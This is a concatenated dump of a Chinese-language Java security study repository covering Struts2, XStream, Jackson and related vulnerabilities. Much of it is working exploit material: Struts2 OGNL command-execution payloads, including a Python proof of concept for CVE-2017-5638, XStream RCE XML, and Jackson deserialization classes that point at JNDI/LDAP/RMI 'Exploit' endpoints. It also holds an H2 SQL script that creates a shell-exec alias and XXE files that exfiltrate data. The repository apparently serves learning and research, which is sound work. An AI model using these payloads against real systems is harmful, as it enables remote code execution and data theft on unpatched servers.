java.lang.String(#e)), 39 | #f.getWriter().flush(), 40 | #f.getWriter().close() 41 | } 42 | ``` 43 | ## 参考 44 | >https://github.com/vulhub/vulhub/blob/master/struts2/s2-012/README.zh-cn.md 45 | -------------------------------------------------------------------------------- /Struts2/Struts2-013/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-013/014 2 | 3 | ## 漏洞介绍 4 | 5 | 在Struts2 的标签中`` 和 `` 都包含一个 includeParams 属性其值可设置为 none,get 或 all,参考官方其对应意义如下: 6 | 7 | 1. none - 链接不包含请求的任意参数值(默认) 8 | 2. get - 链接只包含 GET 请求中的参数和其值 9 | 3. all - 链接包含 GET 和 POST 所有参数和其值 10 | 11 | ``用来显示一个超链接,当`includeParams=all`的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。 12 | 13 | ## 漏洞版本 14 | 15 | 影响版本: 2.0.0 - 2.3.14.1 16 | 17 | 漏洞详情: 18 | 19 | - http://struts.apache.org/docs/s2-013.html 20 | - http://struts.apache.org/docs/s2-014.html 21 | 22 | ## poc 23 | 24 | ``` 25 | ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())} 26 | 27 | // 或 28 | 29 | ${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())} 30 | ``` 31 | 32 | **url编码** 33 | 34 | ``` 35 | a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D 36 | ``` 37 | 38 | ## 参考 39 | 40 | >https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md 41 | -------------------------------------------------------------------------------- /Struts2/Struts2-045/README.md: -------------------------------------------------------------------------------- 1 | # S2-045 远程代码执行漏洞(CVE-2017-5638) 2 | 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 3 | 4 | 简单的说就是在处理Content-Type的post请求的时候使用了ognl表达式注入。注意Content-Type:必须含有multipart/form-data, 5 | ## poc 6 | ```python 7 | import requests 8 | 9 | url = "" 10 | headers={ 11 | 'Content-Type':'''"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='env').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}".multipart/form-data''' 12 | } 13 | re = requests.post(url,headers=headers) 14 | print(re.text) 15 | ``` 16 | -------------------------------------------------------------------------------- /Struts2/img/README.md: -------------------------------------------------------------------------------- 1 | # 照片 2 | -------------------------------------------------------------------------------- /Struts2/img/环境.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/img/环境.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815001234456.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815001234456.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815103726507.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815103726507.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815103750342.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815103750342.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815110026954.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815110026954.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815110029190.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815110029190.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815153940829.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815153940829.png -------------------------------------------------------------------------------- /Xstream/exp/CSRF/CVE-2021-21349.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/DOS/CVE-2017-7957.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/DOS/CVE-2021-21348.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2013-7285-2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | fookey 4 | foovalue 5 | 6 | 7 | 8 | java.lang.Comparable 9 | 10 | 11 | 12 | calc.exe 13 | 14 | 15 | start 16 | 17 | 18 | good 19 | 20 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2013-7285.xml: -------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 | java.lang.Comparable 5 | 6 | 7 | 8 | cmd 9 | /C 10 | calc 11 | 12 | 13 | start 14 | 15 | 16 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2019-10173.xml: -------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 | java.lang.Comparable 5 | 6 | 7 | 8 | cmd 9 | /C 10 | calc 11 | 12 | 13 | start 14 | 15 | 16 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21346.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21347.xml: -------------------------------------------------------------------------------- 1 | no find.. -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21350.xml: -------------------------------------------------------------------------------- 1 | no find.. -------------------------------------------------------------------------------- /Xstream/exp/XXE/CVE-2016-3674.xml: -------------------------------------------------------------------------------- 1 | no find.. -------------------------------------------------------------------------------- /jackson/inject.sql: -------------------------------------------------------------------------------- 1 | CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException { 2 | String[] command = {"cmd", "/c", cmd}; 3 | Runtime.getRuntime().exec(command) 4 | } 5 | $$; 6 | CALL SHELLEXEC('calc') -------------------------------------------------------------------------------- /jackson/jackson.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12086.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | import java.sql.SQLException; 7 | 8 | public class CVE_2019_12086 { 9 | //任意文件读取com.fasterxml.jackson.core <2.9.9 10 | public static void main(String[] args) throws SQLException, IOException { 11 | ObjectMapper mapper = new ObjectMapper(); 12 | mapper.enableDefaultTyping(); 13 | //开启 enableDefaultTyping ,使用构造方法反序列化的方式反序列化 MiniAdmin 类 14 | String json = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://127.0.0.1:3307/?user=flag\"]"; 15 | mapper.readValue(json, Object.class); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12384.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | import java.io.IOException; 5 | 6 | public class CVE_2019_12384 { 7 | //H2Rce 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper objectMapper = new ObjectMapper(); 10 | objectMapper.enableDefaultTyping();//开启 defaultTyping 11 | String json = " [\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CALL SHELLEXEC('calc');\"}]"; 12 | Object o = objectMapper.readValue(json, Object.class);//反序列化对象 13 | String s = objectMapper.writeValueAsString(o);// 14 | 15 | //"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", "+"{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8999/inject.sql'\"}]"; 16 | 17 | // ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd)\\; }$$;"}] 18 | //同样使用文件存储模式,执行 CALL 命令调用函数 这样就省去了再去调用远程文件的问题 19 | // ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CALL SHELLEXEC('calc');"}] 20 | 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12814.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | import org.jdom2.transform.XSLTransformException; 5 | import org.jdom2.transform.XSLTransformer; 6 | 7 | import java.io.IOException; 8 | 9 | public class CVE_2019_12814 { 10 | //JDOM 11 | public static void main(String[] args) throws XSLTransformException { 12 | //XSLTransformer xslTransformer = new XSLTransformer("http://127.0.0.1:8999/hello"); 13 | String payload = "[\"org.jdom2.transform.XSLTransformer\", \"http://127.0.0.1:1234/exp.xml\"]"; 14 | ObjectMapper mapper = new ObjectMapper(); 15 | mapper.enableDefaultTyping(); 16 | try { 17 | Object object = mapper.readValue(payload, Object.class); 18 | } catch (IOException e) { 19 | e.printStackTrace(); 20 | } 21 | } 22 | /** 23 | * https://www.mi1k7ea.com/2019/11/24/Jackson%E7%B3%BB%E5%88%97%E5%85%AD%E2%80%94%E2%80%94CVE-2019-12814%EF%BC%88%E5%9F%BA%E4%BA%8EJDOM-XSLTransformer%E5%88%A9%E7%94%A8%E9%93%BE%EF%BC%89/ 24 | * OWASP推荐的防御XXE的setFeature()要设置下面几个值: 25 | * factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 26 | * factory.setFeature("http://xml.org/sax/features/external-general-entities", false); 27 | * factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 28 | * factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 29 | */ 30 | 31 | } 32 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_14439.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | public class CVE_2019_14439 { 8 | public static void main(String[] args) throws IOException { 9 | String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"rmi://127.0.0.1:1088/evil\"}]"; 10 | ObjectMapper mapper = new ObjectMapper(); 11 | mapper.enableDefaultTyping(); 12 | Object o = mapper.readValue(json, Object.class); 13 | mapper.writeValueAsString(o);//调用所有个 get 方法 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2020_35490.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | public class CVE_2020_35490 { 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper mapper = new ObjectMapper(); 10 | mapper.enableDefaultTyping(); 11 | String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":\"true\"}]"; 12 | 13 | Object o = mapper.readValue(payload, Object.class); 14 | mapper.writeValueAsString(o); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2020_36187.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | public class CVE_2020_36187 { 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper mapper = new ObjectMapper(); 10 | mapper.enableDefaultTyping(); 11 | String payload = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"ldap://127.0.0.1:1389/Exploit\"}]"; 12 | Object o = mapper.readValue(payload, Object.class); 13 | mapper.writeValueAsString(o); 14 | } 15 | } -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/黑名单.txt: -------------------------------------------------------------------------------- 1 | com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator 2 | 3 | https://b1ue.cn/archives/189.html -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/Man.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | public class Man { 4 | public int age; 5 | public String name; 6 | 7 | public Man(){ 8 | System.out.println("无参数构造方法"); 9 | } 10 | 11 | public Man(int age, String name) { 12 | System.out.println("有参数构造方法"); 13 | this.age = age; 14 | this.name = name; 15 | } 16 | public int getAge() { 17 | return age; 18 | } 19 | public void setAge(int age) { 20 | this.age = age; 21 | } 22 | 23 | public String getName() { 24 | System.out.println("get方法"); 25 | return name; 26 | } 27 | 28 | public void setName(String name) { 29 | System.out.println("set方法"); 30 | this.name = name; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/test.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | import com.fasterxml.jackson.annotation.JsonInclude; 4 | import com.fasterxml.jackson.databind.ObjectMapper; 5 | 6 | import java.io.IOException; 7 | 8 | public class test { 9 | public static void main(String[] args) throws IOException { 10 | // 序列化 11 | ObjectMapper objectMapper = new ObjectMapper(); 12 | objectMapper.enableDefaultTyping(); 13 | Man man = new Man(12, "哈哈"); 14 | String jsonString = objectMapper.writeValueAsString(man);//get方法 15 | // 输出 16 | System.out.println(jsonString); 17 | //String poc = "{\"age\":12,\"name\":\"哈哈\"}"; 18 | //Object o = objectMapper.readValue(poc,Man.class);//反序列化 19 | //System.out.println(o); 20 | //String s = objectMapper.writeValueAsString(o);//序列化 21 | //System.out.println(s); 22 | 23 | //String jsonResult = "[\"com.firebasky.learn.test_poc\",\"test\"]"; 24 | //objectMapper.readValue(jsonResult,Object.class); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/test_poc.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | public class test_poc { 4 | public test_poc(){}; 5 | public test_poc(String name){ 6 | System.out.println(name); 7 | } 8 | public test_poc(int age){ 9 | System.out.println(age); 10 | } 11 | public test_poc(String name,int age){ 12 | System.out.println(name+age); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/self/hikaricp.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.self; 2 | 3 | 4 | import com.fasterxml.jackson.databind.ObjectMapper; 5 | 6 | import java.io.IOException; 7 | 8 | public class hikaricp { 9 | public static void main(String[] args) throws IOException { 10 | String json = "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://127.0.0.1:1088/evil\"}]"; 11 | ObjectMapper mapper = new ObjectMapper(); 12 | mapper.enableDefaultTyping(); 13 | Object o = mapper.readValue(json, Object.class); 14 | mapper.writeValueAsString(o);//调用所有个 get 方法 15 | } 16 | /** 17 | * https://curz0n.github.io/2019/09/20/cve-2019-14540/#3-%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE 18 | */ 19 | } 20 | -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12086.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12086.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12384.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12384.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12814.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12814.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_14379.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_14379.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_14439.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_14439.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2020_35490.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2020_35490.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2020_36187.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2020_36187.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/Man.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/Man.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/test.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/test_poc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/test_poc.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/self/hikaricp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/self/hikaricp.class -------------------------------------------------------------------------------- /jackson/xxe/evil.dtd: -------------------------------------------------------------------------------- 1 | "> %all; 2 | -------------------------------------------------------------------------------- /jackson/xxe/exp.xml: -------------------------------------------------------------------------------- 1 | 3 | 4 | %remote; 5 | %send; 6 | ]> -------------------------------------------------------------------------------- /java-web/README.md: -------------------------------------------------------------------------------- 1 | # 关于javaweb的学习 2 | -------------------------------------------------------------------------------- /java-web/java安全之java-web.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java-web/java安全之java-web.pdf -------------------------------------------------------------------------------- /java-web/java文件漏洞检查.md: -------------------------------------------------------------------------------- 1 | 在IDEA中的项目中重点搜下如下文件读取的类。 2 | 3 | JDK原始的java.io.FileInputStream、java.io.FileInputStream类; 4 | JDK原始的java.io.RandomAccessFile类; 5 | Apache Commons IO提供的org.apache.commons.io.FileUtils类; 6 | JDK1.7新增的基于NIO非阻塞异步读取文件的java.nio.channels.AsynchronousFileChannel类; 7 | JDK1.7新增的基于NIO读取文件的java.nio.file.Files类。常用方法如:Files.readAllBytes、Files.readAllLines; 8 | java.io.File类的list、listFiles、listRoots、delete方法; 9 | 除此之外,还可以搜索一下FileUtil/FileUtils很有可能用户会封装文件操作的工具类。 10 | 11 | java.io.FileInputStream 12 | java.io.FileInputStream 13 | java.io.FileInputStream 14 | org.apache.commons.io.FileUtils 15 | java.nio.channels.AsynchronousFileChannel 16 | java.nio.file.Files 17 | Files.readAllBytes 18 | Files.readAllLines 19 | list 20 | listFiles 21 | listRoots 22 | delete 23 | FileUtil/FileUtils 24 | -------------------------------------------------------------------------------- /java内存马/Readme.md: -------------------------------------------------------------------------------- 1 | # java内存马 2 | 3 | + [awd shiro内存木马注入](https://github.com/KpLi0rn/ShiroVulnEnv) 4 | -------------------------------------------------------------------------------- /java内存马/Tomcat Filter/Readme.md: -------------------------------------------------------------------------------- 1 | # Tomcat Filter 2 | -------------------------------------------------------------------------------- /java内存马/Tomcat Filter/Tomcat Filter.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java内存马/Tomcat Filter/Tomcat Filter.rar -------------------------------------------------------------------------------- /java内存马/agent/java-agent学习.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java内存马/agent/java-agent学习.pdf -------------------------------------------------------------------------------- /java回显/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.5/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /java回显/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.5.5 9 | 10 | 11 | com.firebasky 12 | echo 13 | 0.0.1-SNAPSHOT 14 | echo 15 | echo for java exec 16 | 17 | 1.8 18 | 19 | 20 | 21 | org.springframework.boot 22 | spring-boot-starter-web 23 | 24 | 25 | 26 | org.springframework.boot 27 | spring-boot-starter-test 28 | test 29 | 30 | 31 | 32 | 33 | 34 | 35 | org.springframework.boot 36 | spring-boot-maven-plugin 37 | 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /java回显/src/main/java/com/firebasky/echo/EchoApplication.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class EchoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(EchoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /java回显/src/main/java/com/firebasky/echo/controller/demo.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo.controller; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class demo { 8 | @RequestMapping("/demo") 9 | public void demo() throws InterruptedException { 10 | new Alltomcat(); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /java回显/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /java回显/src/test/java/com/firebasky/echo/EchoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class EchoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /java安全基础/Java class文件格式.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/Java class文件格式.pdf -------------------------------------------------------------------------------- /java安全基础/README.md: -------------------------------------------------------------------------------- 1 | # 介绍java的一些基础 2 | -------------------------------------------------------------------------------- /java安全基础/java内部类.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java内部类.pdf -------------------------------------------------------------------------------- /java安全基础/java反射.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java反射.pdf -------------------------------------------------------------------------------- /java安全基础/java基础.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java基础.pdf -------------------------------------------------------------------------------- /java小型框架/img/CVE-2019-9615.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/img/CVE-2019-9615.png -------------------------------------------------------------------------------- /java小型框架/img/Readme.md: -------------------------------------------------------------------------------- 1 | # 各个cms的流程图 2 | 3 | 可能不全,太不方便做咯 4 | -------------------------------------------------------------------------------- /java小型框架/java代码审计之租车系统.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/java代码审计之租车系统.pdf -------------------------------------------------------------------------------- /java小型框架/代码审计基础.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/代码审计基础.pdf -------------------------------------------------------------------------------- /java序列化基础/ClassLoader(类加载机制).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/ClassLoader(类加载机制).pdf -------------------------------------------------------------------------------- /java序列化基础/Java反射机制2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/Java反射机制2.pdf -------------------------------------------------------------------------------- /java序列化基础/README.md: -------------------------------------------------------------------------------- 1 | # 介绍java反射和java类加载机制 2 | -------------------------------------------------------------------------------- /java序列化基础/java反射机制.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/java反射机制.pdf -------------------------------------------------------------------------------- /java序列化链/Clojure/SerializeUtil.java: -------------------------------------------------------------------------------- 1 | package Tools; 2 | 3 | import java.io.*; 4 | 5 | public class SerializeUtil { 6 | 7 | public static void writeObjectToFile(Object obj,String fileName) throws Exception { 8 | ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream(fileName)); 9 | outputStream.writeObject(obj); 10 | outputStream.close(); 11 | } 12 | public static void readFileObject(String fileName) throws Exception { 13 | ObjectInputStream ois = new ObjectInputStream(new FileInputStream(fileName)); 14 | Object o = ois.readObject(); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /java序列化链/CommonsBeanutils/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package CommonsBeanutils; 2 | 3 | import java.util.PriorityQueue; 4 | import Tools.SerializeUtil; 5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 6 | import org.apache.commons.beanutils.BeanComparator; 7 | 8 | public class CommonsBeanutils1 { 9 | public static String fileName = "CommonsBeanutils1.bin"; 10 | public static void main(String[] args) throws Exception { 11 | TemplatesImpl tmpl = SerializeUtil.generateTemplatesImpl(); 12 | //Collections.reverseOrder() 13 | //final BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder()); 14 | final BeanComparator comparator = new BeanComparator(null, 